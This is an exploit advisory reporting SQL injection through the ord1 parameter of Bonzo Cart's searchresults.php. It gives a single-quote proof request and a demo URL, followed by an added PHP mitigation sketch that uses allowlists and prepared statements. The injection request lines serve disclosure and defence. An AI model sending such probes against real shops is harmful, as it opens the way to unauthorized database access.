# Exploit Title: Bonzo Cart (E-Commerce System) SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.turnkeycentral.com
# Version: All versions
# Tested on: All versions are vulnerable

ISSUE

SQL injection is possible through the ord1 request parameter of searchresults.php.

Example

searchresults.php?ord1=<SQL Injection Code>&ord2=asc&search1=&SearchTerm=&where=ItemName

Exploit:

searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName

Demo:

http://site.com/bonzacart/searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName
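
Mitigation sketch (an added example, not Bonzo Cart's code and not part of the original advisory): one way to handle the parameters of the request above so that ord1, ord2 and where never reach the SQL text. It assumes ord1 and where select columns and ord2 a sort direction; the function names, the items table and its columns are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example: table and column names are hypothetical, not Bonzo Cart's schema.
function buildSearchQuery(array $get): array
{
    // Request value => real column. Only these identifiers can reach the SQL text.
    $sortable   = ['ItemName' => 'item_name', 'Price' => 'price', 'ItemID' => 'item_id'];
    $searchable = ['ItemName' => 'item_name', 'Description' => 'description'];

    // Treat missing or non-string (array) parameters as empty.
    $str = static function (string $key) use ($get): string {
        return is_string($get[$key] ?? null) ? $get[$key] : '';
    };

    // ord1, ord2 and where name identifiers/keywords, which cannot be bound as
    // parameters, so unknown values fall back to fixed defaults.
    $orderCol  = $sortable[$str('ord1')] ?? 'item_name';
    $direction = strtolower($str('ord2')) === 'desc' ? 'DESC' : 'ASC';
    $searchCol = $searchable[$str('where')] ?? 'item_name';

    // SearchTerm is data: bind it, escaping LIKE wildcards with '!'.
    $like = '%' . strtr($str('SearchTerm'), ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';

    $sql = "SELECT item_id, item_name, price FROM items "
         . "WHERE {$searchCol} LIKE :term ESCAPE '!' "
         . "ORDER BY {$orderCol} {$direction}";
    return [$sql, [':term' => $like]];
}

// Runs the query through a prepared statement on any PDO connection.
function search(PDO $pdo, array $get): array
{
    [$sql, $params] = buildSearchQuery($get);
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed request carrying the ord1 value from the advisory.
[$sql, $params] = buildSearchQuery(
    ['ord1' => "'1", 'ord2' => 'asc', 'search1' => '', 'SearchTerm' => '', 'where' => 'ItemName']
);
echo $sql, PHP_EOL;
```

With the advisory's ord1 value the allowlist lookup misses, so the query is ordered by the default column and the quote character never appears in the statement.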